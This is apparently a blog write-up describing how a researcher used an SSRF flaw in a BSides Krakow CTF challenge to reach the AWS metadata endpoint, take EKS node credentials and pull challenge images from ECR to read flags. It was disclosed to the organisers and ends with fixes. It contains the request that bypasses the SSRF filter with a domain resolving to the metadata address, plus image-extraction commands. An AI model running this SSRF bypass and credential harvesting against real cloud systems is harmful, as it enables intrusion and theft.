Writeup

While I wasn’t able to attend BSides Krakow myself, my colleague @Datosh18 was present and playing their Capture the Flag and asked if I wanted to take a look at the challenges. This post details how we gained access to the underlying AWS infrastructure which hosted the challenges to retrieve multiple flags. Everything in this post was revealed to the event organisers and the CTF platform team (MetaCTF) prior to publication.

The first challenge I tried presented an application which sent an HTTP request. From prior experience, this smelled of an SSRF scenario. On a hunch that the challenge was probably hosted in AWS, I tried to connect to the AWS metadata on http://169.254.169.254. This was instantly rejected:

Request: 
POST /check HTTP/1.1
Host: fbe1ssag.chals.mctf.io
<-- snip -->

url=http%3A%2F%2F169.254.169.254

Response:
HTTP/1.1 200 OK
Date: Sat, 14 Sep 2024 13:29:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 27

Security block: Invalid URL

Again based on a hunch, I tried requesting metadata.smartyboy.ninja, a subdomain I use to point back to 169.254.169.254 to bypass regex-based protections. To my surprise, this worked.1

Request:
POST /check HTTP/1.1
Host: fbe1ssag.chals.mctf.io
<-- snip -->

url=http%3A%2F%2Fmetadata.smartyboy.ninja

Response:
HTTP/1.1 200 OK
Date: Sat, 14 Sep 2024 13:29:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 336

The site is up. Status code: 200
 Text: 1.0
2007-01-19
<-- snip -->
2022-09-24
latest

I looked through the IAM roles avaialble to the node and found one named AmazonEKSNodeRole. This is a reasonable indicator that the challenge is being hosted in Amazon’s managed Kubernetes service, EKS. To test this hypothesis, I referred to the default permissions for the EKS node role as detailed in https://docs.aws.amazon.com/eks/latest/userguide/create-node-role.html, specifically AmazonEKSWorkerNodePolicy and AmazonEC2ContainerRegistryReadOnly.

At this point it did occur to me that I might not be on the intended solve path, but I wanted to see how far the path would take me.2 My first thought was to use the AWS credentials to get a Kubeconfig and authenticate to the relevant EKS cluster. This can be accomplished through the aws eks update-kubeconfig command. This command needs the name of the cluster to assume, which we didn’t have originally. Thankfully, this can be retrieved from the user-data for the EC2 instance:

The site is up. Status code: 200 Text: [settings.kubernetes] "cluster-name" = "[REDACT]" "api-server" = "https://XXXXX.gr7.us-east-1.eks.amazonaws.com" "cluster-certificate" = "[REDACT]" "cluster-dns-ip" = "172.20.0.10" "max-pods" = 110 [settings.kubernetes.node-labels] "eks.amazonaws.com/nodegroup-image" = "ami-[REDACT]" "eks.amazonaws.com/capacityType" = "ON_DEMAND" "eks.amazonaws.com/nodegroup" = "[REDACT]"

Before getting a Kubeconfig, I wanted to check the cluster was live and reachable, using aws eks describe-kubeconfig.

{
    "cluster": {
        "name": "[REDACT]",
        "arn": "arn:aws:eks:us-east-1:[REDACT]:cluster/[REDACT]",
        "createdAt": "2023-09-16T06:34:36.166000+01:00",
        "version": "1.30",
        "endpoint": "https://[REDACT].gr7.us-east-1.eks.amazonaws.com",
        "roleArn": "arn:aws:iam::[REDACT]:role/EKS_Cluster_Role",
        "resourcesVpcConfig": {
            "subnetIds": [
                "subnet-02[REDACT]",
                "subnet-05[REDACT]",
                "subnet-00[REDACT]",
                "subnet-02[REDACT]"
            ],
            "securityGroupIds": [
                "sg-0e[REDACT]"
            ],
            "clusterSecurityGroupId": "sg-05[REDACT]",
            "vpcId": "vpc-09[REDACT]",
            "endpointPublicAccess": false,
            "endpointPrivateAccess": true,
            "publicAccessCidrs": []
        },
        ...

Damn. Note that in the code above, endpointPublicAccess is set to false. We can’t talk directly to the cluster endpoint. I did attempt to access the cluster API Server endpoints from some of the challenges which required players to SSH in, but I had no idea if these SSH endpoints were in the same cluster. However, our goal was to get flags. Cluster-admin would be nice, but far from required.

Looking at the permissions allocated to an EKS node in a reference architecture, we have two policies. The first is the one that lets us (or more specifically the node Kubelet, which we’re impersonating) generate tokens for the cluster and perform API Server requests. The latter allows the kubelet to log in to ECR repositories and pull images.

With this access, we were able to pull a number of images from ECR in a registry named [ACCOUNTNUMBER].dkr.ecr.us-east-1.amazonaws.com/meta-chal-images. I’ll be intentionally vague on details for this last step but suffice to say, we were able to pull challenge images for a number of web-based challenges. Many of these had flags in the images, which we could identify by grepping for “CTF” in the expanded image file systems.3

1
2
3
4
docker save [ACCOUNTNUMBER].dkr.us-east-1.amazonaws.com/meta-chal-images:[CHALLENGENAME] -o archive.tar
tar -xvf archive.tar
grep -ir "CTF" .
./sha256/a72[REDACT]e8d:{"id":"[REDACT]","parent":"[REDACT]","created":"2023-12-16T18:41:33.638158158Z","container_config":{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"config":{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"80/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","FLASK_APP=main.py","flag=MetaCTF{[REDACT]}"],"Cmd":["supervisord","-n"],"ArgsEscaped":true,"Image":"","Volumes":null,"WorkingDir":"/src","Entrypoint":null,"OnBuild":null,"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"22.04"}},"architecture":"amd64","os":"linux"}

This was enough to confirm that I could get a significant number of the flags for our active CTF, and others which were active in the platform but not for our specific event. At this point, I stopped pursuing this path and contacted the event organisers and MetaCTF directly.

Recommendations

The core problem arose because the EKS cluster hosting challenges did not prevent hosted pods accessing the AWS Metadata endpoint. Per AWS’ recommendations, this can be accomplished in one of two ways:

  • Block access through networkpolicy
  • Use IDMSv2 with a maximum hop count of 1

I spoke with MetaCTF before publishing this post, and know that at least one of these approaches has been used and the attack path is closed.


  1. I did later work out why, but in the interest of not spoiling the challenge for others, I’m just going to leave this mysterious note instead of explaining. ↩︎

  2. The CTF rules did state that attacking the platform was not permitted. We didn’t submit any of the flags we learned this way. ↩︎

  3. This isn’t a particularly new thing. The earliest similar example I’ve found is from 2017 ↩︎